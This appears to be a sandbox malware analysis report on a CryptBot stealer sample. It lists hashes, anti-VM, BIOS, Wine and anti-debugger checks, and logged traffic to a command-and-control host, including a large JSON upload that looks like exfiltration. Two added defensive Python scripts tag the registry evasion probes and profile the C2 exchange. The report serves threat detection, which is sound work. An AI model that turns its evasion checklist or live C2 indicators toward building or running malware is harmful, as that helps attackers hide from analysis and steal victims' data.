Analysis

max time kernel: 92s
max time network: 149s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 21-12-2024 03:13

Static task: static1
Behavioral task: behavioral1
Sample: f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe
Resource: win7-20240903-en
General

Target: f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe
Size: 4.3MB
MD5: 67844ee11cdf53db1185db90d33cf907
SHA1: 33dc77a1ae23d6a5bc0da0429ad3f0f855c8d4d9
SHA256: f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09
SHA512: f317adaa600efbe4db4fc630a8d971328b40e44c6b94fdc5bc8aafcf1ad47626a94db815dbf62e655de4600ba4b89651ad76ff7df71ec39543ca301f94524a76
SSDEEP: 98304:OYexTGTTGbdZZElFJWR3a+zn3kMkslFzf1n5MFJW43R8:WMTcdEs9VRnM3WYO
Malware Config

Extracted family: cryptbot
Signatures

Every IoC below was produced by f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe (PID 220).

Cryptbot family

Enumerates VirtualBox registry keys (2 TTPs, 1 IoC)
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF

Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs, 1 IoC)
  Key opened: \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__

Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
  Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Identifies Wine through registry keys (2 TTPs, 1 IoC)
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
  Key opened: \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine

Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system. The report lists no concrete key for this signature.

Suspicious use of NtSetInformationThreadHideFromDebugger (1 IoC)
Setting ThreadHideFromDebugger (thread information class 0x11) on a thread stops the kernel from delivering that thread's debug events, so an attached debugger silently loses its breakpoints and exceptions there; it is a common anti-debugging step.
  PID 220: f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe

System Location Discovery: System Language Discovery (1 TTP, 1 IoC)
Attempts to gather information about the system language of the victim host in order to infer its geographical location.
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language

Suspicious behavior: EnumeratesProcesses (10 IoCs)
  PID 220: f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe (10 occurrences, all from this one process)
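The registry checks listed above are the handful of keys most anti-sandbox code reads, and they show up in process-monitor or EDR registry telemetry in either native form (\REGISTRY\MACHINE\...) or Win32 form (HKLM\...). The script below is an added example, not part of the report and not any vendor's detection rule: it normalises both path forms, tags accesses against patterns modelled on the IoCs in this report (widened slightly to the other VirtualBox guest services and ACPI tables, and to the Uninstall key that the "checks installed software" signature refers to, for which the report lists no concrete path), and calls a process "anti-analysis" once it has touched two or more distinct sandbox-detection families. The sample events are constructed from the IoCs above (PID 220) plus one benign read and one hypothetical Uninstall-key read; the families and the threshold are my choices.

```python
"""Tag registry accesses against the anti-analysis checks listed in this report."""
import re
from collections import Counter

# Native paths as the sandbox logs them, mapped to the Win32 hive shorthand most
# EDR telemetry uses. Any per-user SID is folded into HKCU (a simplification).
_HIVE_RE = re.compile(
    r"^\\REGISTRY\\(?:(?P<hklm>MACHINE)|USER\\(?:S-1-5-21-[\d-]+|\.DEFAULT))\\?",
    re.IGNORECASE,
)


def normalize(path):
    """\\REGISTRY\\MACHINE\\X -> HKLM\\X, \\REGISTRY\\USER\\<SID>\\X -> HKCU\\X, upper-cased."""
    m = _HIVE_RE.match(path)
    if not m:
        return path.upper()
    hive = "HKLM" if m.group("hklm") else "HKCU"
    return (hive + "\\" + path[m.end():]).upper()


# (tag, pattern over the normalised path). The patterns mirror the IoCs above,
# widened to the other VirtualBox guest services and ACPI tables; the Uninstall
# rule covers the 'checks installed software' signature, which lists no key.
RULES = [
    ("vbox:service", r"^HKLM\\SYSTEM\\CONTROLSET\d+\\SERVICES\\VBOX(SF|GUEST|MOUSE|SERVICE|VIDEO)$"),
    ("vbox:acpi", r"^HKLM\\HARDWARE\\ACPI\\(DSDT|FADT|RSDT)\\VBOX__$"),
    ("bios:version", r"^HKLM\\HARDWARE\\DESCRIPTION\\SYSTEM\\(SYSTEM|VIDEO)BIOSVERSION$"),
    ("wine", r"^HKCU\\SOFTWARE\\WINE(\\|$)"),
    ("nls:language", r"^HKLM\\SYSTEM\\CONTROLSET\d+\\CONTROL\\NLS\\LANGUAGE(\\|$)"),
    ("software:uninstall", r"^HKLM\\SOFTWARE\\(WOW6432NODE\\)?MICROSOFT\\WINDOWS\\CURRENTVERSION\\UNINSTALL(\\|$)"),
]
_COMPILED = [(tag, re.compile(pat)) for tag, pat in RULES]

# Families whose presence points at sandbox/VM detection rather than plain recon.
ANTI_ANALYSIS_FAMILIES = {"vbox", "bios", "wine"}


def classify(path):
    """Return the tags a single registry path matches (usually zero or one)."""
    norm = normalize(path)
    return [tag for tag, rx in _COMPILED if rx.search(norm)]


def summarize(events, min_families=2):
    """events: iterable of (pid, operation, path).
    Returns ({pid: Counter(tags)}, {pid: 'anti-analysis' | 'recon'}); a process is
    'anti-analysis' once it has touched at least min_families distinct families."""
    per_pid = {}
    for pid, _op, path in events:
        tags = classify(path)
        if tags:
            per_pid.setdefault(pid, Counter()).update(tags)
    verdicts = {}
    for pid, counts in per_pid.items():
        families = {t.split(":")[0] for t in counts} & ANTI_ANALYSIS_FAMILIES
        verdicts[pid] = "anti-analysis" if len(families) >= min_families else "recon"
    return per_pid, verdicts


# Constructed from the IoCs above (pid 220), plus one benign read and one
# hypothetical Uninstall-key read that the report describes but does not list.
SAMPLE_EVENTS = [
    (220, "open",  r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF"),
    (220, "open",  r"\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__"),
    (220, "query", r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion"),
    (220, "query", r"\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion"),
    (220, "open",  r"\REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine"),
    (220, "open",  r"\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language"),
    (220, "open",  r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"),
    (220, "open",  r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"),
]

if __name__ == "__main__":
    per_pid, verdicts = summarize(SAMPLE_EVENTS)
    for pid, counts in per_pid.items():
        print(pid, verdicts[pid], dict(counts))
```

The NLS language read is tagged but deliberately kept out of the anti-analysis families: on its own it is ordinary locale discovery (a great many benign installers do it), and it only becomes interesting in combination with the VM and BIOS probes, which is what the per-process family count captures.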
Processes

C:\Users\Admin\AppData\Local\Temp\f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe"
  PID: 220
  Signatures triggered:
  - Enumerates VirtualBox registry keys
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Identifies Wine through registry keys
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
Network

DNS to 8.8.8.8:53
  request:  httpbin.org IN A
  response: (none logged)

DNS to 8.8.8.8:53
  request:  httpbin.org IN AAAA
  response: httpbin.org IN A 98.85.100.80; httpbin.org IN A 34.226.108.155

DNS to 8.8.8.8:53
  request:  8.8.8.8.in-addr.arpa IN PTR
  response: dns.google

DNS to 8.8.8.8:53
  request:  58.55.71.13.in-addr.arpa IN PTR
  response: (none logged)

DNS to 8.8.8.8:53
  request:  83.210.23.2.in-addr.arpa IN PTR
  response: a2-23-210-83.deploy.static.akamaitechnologies.com

DNS to 8.8.8.8:53
  request:  80.100.85.98.in-addr.arpa IN PTR
  response: ec2-98-85-100-80.compute-1.amazonaws.com

DNS to 8.8.8.8:53
  request:  home.twentytk20pn.top IN A
  response: (none logged)

DNS to 8.8.8.8:53
  request:  home.twentytk20pn.top IN AAAA
  response: home.twentytk20pn.top IN A 147.45.113.159

HTTP POST http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
  process: f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe
  remote address: 147.45.113.159:80
  request:
    POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
    Host: home.twentytk20pn.top
    Accept: */*
    Content-Type: application/json
    Content-Length: 481042
  response:
    HTTP/1.1 200 OK
    Date: Sat, 21 Dec 2024 03:13:52 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 1
    Connection: close

DNS to 8.8.8.8:53
  request:  159.113.45.147.in-addr.arpa IN PTR
  response: (none logged)

DNS to 8.8.8.8:53
  request:  75.159.190.20.in-addr.arpa IN PTR
  response: (none logged)

DNS to 8.8.8.8:53
  request:  95.221.229.192.in-addr.arpa IN PTR
  response: (none logged)

DNS to 8.8.8.8:53
  request:  home.twentytk20pn.top IN A
  response: home.twentytk20pn.top IN A 147.45.113.159

DNS to 8.8.8.8:53
  request:  home.twentytk20pn.top IN AAAA
  response: (none logged)

HTTP GET http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=0
  process: f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe
  remote address: 147.45.113.159:80
  request:
    GET /WEIsmPfDcpBFJozngnYN1734366322?argument=0 HTTP/1.1
    Host: home.twentytk20pn.top
    Accept: */*
  response:
    HTTP/1.1 404 NOT FOUND
    Date: Sat, 21 Dec 2024 03:13:53 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 207
    Connection: close

DNS to 8.8.8.8:53
  request:  home.twentytk20pn.top IN A
  response: home.twentytk20pn.top IN A 147.45.113.159

DNS to 8.8.8.8:53
  request:  home.twentytk20pn.top IN AAAA
  response: (none logged)

HTTP POST http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
  process: f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe
  remote address: 147.45.113.159:80
  request:
    POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
    Host: home.twentytk20pn.top
    Accept: */*
    Content-Type: application/json
    Content-Length: 31
  response:
    HTTP/1.1 404 NOT FOUND
    Date: Sat, 21 Dec 2024 03:13:53 GMT
    Content-Type: text/html; charset=utf-8
    Content-Length: 207
    Connection: close

DNS to 8.8.8.8:53
  request:  104.219.191.52.in-addr.arpa IN PTR
  response: (none logged)

DNS to 8.8.8.8:53
  request:  56.163.245.4.in-addr.arpa IN PTR
  response: (none logged)

DNS to 8.8.8.8:53
  request:  198.187.3.20.in-addr.arpa IN PTR
  response: (none logged)

DNS to 8.8.8.8:53
  request:  172.210.232.199.in-addr.arpa IN PTR
  response: (none logged)

DNS to 8.8.8.8:53
  request:  172.214.232.199.in-addr.arpa IN PTR
  response: (none logged)

DNS to 8.8.8.8:53
  request:  11.227.111.52.in-addr.arpa IN PTR
  response: (none logged)
Connection summary (sent / received bytes, sent / received packets):

98.85.100.80:443  httpbin.org  tls  f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe  1.5kB / 6.4kB  14 / 15

147.45.113.159:80  http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322  http  f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe  495.7kB / 13.5kB  363 / 334
  HTTP request:  POST http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
  HTTP response: 200

147.45.113.159:80  http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=0  http  f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe  331 B / 544 B  5 / 4
  HTTP request:  GET http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322?argument=0
  HTTP response: 404

147.45.113.159:80  http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322  http  f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe  404 B / 544 B  5 / 4
  HTTP request:  POST http://home.twentytk20pn.top/WEIsmPfDcpBFJozngnYN1734366322
  HTTP response: 404
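Three transactions to one path make the C2 exchange easy to profile: a 481,042-byte JSON POST answered with a 1-byte 200, then a GET with ?argument=0 and a 31-byte POST that both draw a 404. The script below is an added example (not the report's or the sandbox's code) that parses the recorded request and response heads, builds the indicator list, and flags the first transaction with a "large JSON POST, near-empty 200" heuristic; the bodies were not captured, so the heuristic works on sizes and headers only. It also reads the 10-digit suffix of the path as a Unix timestamp, which gives 2024-12-16T16:25:22Z, about four and a half days before submission; that reading is mine, the report does not say what the token is. The httpbin.org TLS session in the summary is consistent with a public-IP lookup, but nothing in the report shows its content, so it is left out of the indicator list here. The thresholds in looks_like_exfil are my choices.

```python
"""Profile the HTTP exchange with home.twentytk20pn.top recorded in this report."""
import re
from datetime import datetime, timezone
from urllib.parse import urlsplit

# The three transactions as logged above (heads only; bodies were not captured).
TRANSACTIONS = [
    {
        "ip": "147.45.113.159", "port": 80,
        "request": ("POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1\r\n"
                    "Host: home.twentytk20pn.top\r\nAccept: */*\r\n"
                    "Content-Type: application/json\r\nContent-Length: 481042\r\n\r\n"),
        "response": ("HTTP/1.1 200 OK\r\nDate: Sat, 21 Dec 2024 03:13:52 GMT\r\n"
                     "Content-Type: text/html; charset=utf-8\r\nContent-Length: 1\r\n"
                     "Connection: close\r\n\r\n"),
    },
    {
        "ip": "147.45.113.159", "port": 80,
        "request": ("GET /WEIsmPfDcpBFJozngnYN1734366322?argument=0 HTTP/1.1\r\n"
                    "Host: home.twentytk20pn.top\r\nAccept: */*\r\n\r\n"),
        "response": ("HTTP/1.1 404 NOT FOUND\r\nDate: Sat, 21 Dec 2024 03:13:53 GMT\r\n"
                     "Content-Type: text/html; charset=utf-8\r\nContent-Length: 207\r\n"
                     "Connection: close\r\n\r\n"),
    },
    {
        "ip": "147.45.113.159", "port": 80,
        "request": ("POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1\r\n"
                    "Host: home.twentytk20pn.top\r\nAccept: */*\r\n"
                    "Content-Type: application/json\r\nContent-Length: 31\r\n\r\n"),
        "response": ("HTTP/1.1 404 NOT FOUND\r\nDate: Sat, 21 Dec 2024 03:13:53 GMT\r\n"
                     "Content-Type: text/html; charset=utf-8\r\nContent-Length: 207\r\n"
                     "Connection: close\r\n\r\n"),
    },
]

_REQ_LINE = re.compile(r"^(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d$")
_STATUS_LINE = re.compile(r"^HTTP/\d\.\d (?P<status>\d{3})")


def _split(raw):
    """Return (start line, {lower-cased header name: value}) for a raw HTTP head."""
    lines = raw.split("\r\n")
    headers = {}
    for line in lines[1:]:
        if not line:
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def parse_request(raw):
    start, h = _split(raw)
    m = _REQ_LINE.match(start)
    if not m:
        raise ValueError(f"not a request line: {start!r}")
    target = urlsplit(m["target"])
    return {"method": m["method"], "path": target.path, "query": target.query,
            "host": h.get("host", ""), "content_type": h.get("content-type", ""),
            "content_length": int(h.get("content-length", "0"))}


def parse_response(raw):
    start, h = _split(raw)
    m = _STATUS_LINE.match(start)
    if not m:
        raise ValueError(f"not a status line: {start!r}")
    return {"status": int(m["status"]), "content_length": int(h.get("content-length", "0"))}


def decode_path(path):
    """Split '/<letters><10 digits>' and read the digits as a Unix timestamp.
    This is an interpretation of the token, not something the report states."""
    m = re.match(r"^/(?P<tag>[A-Za-z]+)(?P<ts>\d{10})$", path)
    if not m:
        return None
    ts = int(m["ts"])
    return {"tag": m["tag"], "epoch": ts,
            "utc": datetime.fromtimestamp(ts, tz=timezone.utc).isoformat()}


def profile(transactions):
    """Return ([(method, query, request bytes, status, response bytes), ...], {indicators})."""
    stages, iocs = [], set()
    for tx in transactions:
        req, resp = parse_request(tx["request"]), parse_response(tx["response"])
        iocs.update({req["host"], tx["ip"], f"http://{req['host']}{req['path']}"})
        stages.append((req["method"], req["query"], req["content_length"],
                       resp["status"], resp["content_length"]))
    return stages, iocs


def looks_like_exfil(tx, min_body=100_000, max_reply=4):
    """Large JSON POST over plain HTTP acknowledged with a near-empty 200 (thresholds are mine)."""
    req, resp = parse_request(tx["request"]), parse_response(tx["response"])
    return (req["method"] == "POST"
            and req["content_type"].startswith("application/json")
            and req["content_length"] >= min_body
            and resp["status"] == 200
            and resp["content_length"] <= max_reply)


if __name__ == "__main__":
    stages, iocs = profile(TRANSACTIONS)
    for s in stages:
        print("%-4s query=%-12r sent=%7d -> %d (%d bytes back)" % s)
    print("indicators:", sorted(iocs))
    print("path token:", decode_path(parse_request(TRANSACTIONS[0]["request"])["path"]))
```

The 404s on the follow-up GET and the small POST are worth keeping in the profile rather than discarding as noise: the server accepted the large upload and then refused the same path, which is the shape of a one-shot drop endpoint, and a network-side rule keyed only on the 200 would miss the two requests that confirm it.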
DNS summary (sent / received bytes, sent / received packets):

httpbin.org  dns  160 B / 250 B  2 / 2
  DNS request: httpbin.org
  DNS request: httpbin.org
  DNS response: 98.85.100.80, 34.226.108.155

8.8.8.8.in-addr.arpa  dns  66 B / 90 B  1 / 1
  DNS request: 8.8.8.8.in-addr.arpa

58.55.71.13.in-addr.arpa  dns  70 B / 144 B  1 / 1
  DNS request: 58.55.71.13.in-addr.arpa

83.210.23.2.in-addr.arpa  dns  70 B / 133 B  1 / 1
  DNS request: 83.210.23.2.in-addr.arpa

80.100.85.98.in-addr.arpa  dns  71 B / 125 B  1 / 1
  DNS request: 80.100.85.98.in-addr.arpa

8.8.8.8:53  home.twentytk20pn.top  dns  f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe  180 B / 232 B  2 / 2
  DNS request: home.twentytk20pn.top
  DNS request: home.twentytk20pn.top
  DNS response: 147.45.113.159

159.113.45.147.in-addr.arpa  dns  73 B / 139 B  1 / 1
  DNS request: 159.113.45.147.in-addr.arpa

75.159.190.20.in-addr.arpa  dns  72 B / 158 B  1 / 1
  DNS request: 75.159.190.20.in-addr.arpa

95.221.229.192.in-addr.arpa  dns  73 B / 144 B  1 / 1
  DNS request: 95.221.229.192.in-addr.arpa

8.8.8.8:53  home.twentytk20pn.top  dns  f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe  180 B / 232 B  2 / 2
  DNS request: home.twentytk20pn.top
  DNS request: home.twentytk20pn.top
  DNS response: 147.45.113.159

8.8.8.8:53  home.twentytk20pn.top  dns  f00b4916dfb8458f46a8e4d556884b185676d28d3253be0f561db7d1f9bf3c09.exe  180 B / 232 B  2 / 2
  DNS request: home.twentytk20pn.top
  DNS request: home.twentytk20pn.top
  DNS response: 147.45.113.159

104.219.191.52.in-addr.arpa  dns  73 B / 147 B  1 / 1
  DNS request: 104.219.191.52.in-addr.arpa

56.163.245.4.in-addr.arpa  dns  71 B / 157 B  1 / 1
  DNS request: 56.163.245.4.in-addr.arpa

198.187.3.20.in-addr.arpa  dns  71 B / 157 B  1 / 1
  DNS request: 198.187.3.20.in-addr.arpa

172.210.232.199.in-addr.arpa  dns  74 B / 128 B  1 / 1
  DNS request: 172.210.232.199.in-addr.arpa

172.214.232.199.in-addr.arpa  dns  74 B / 128 B  1 / 1
  DNS request: 172.214.232.199.in-addr.arpa

11.227.111.52.in-addr.arpa  dns  72 B / 158 B  1 / 1
  DNS request: 11.227.111.52.in-addr.arpa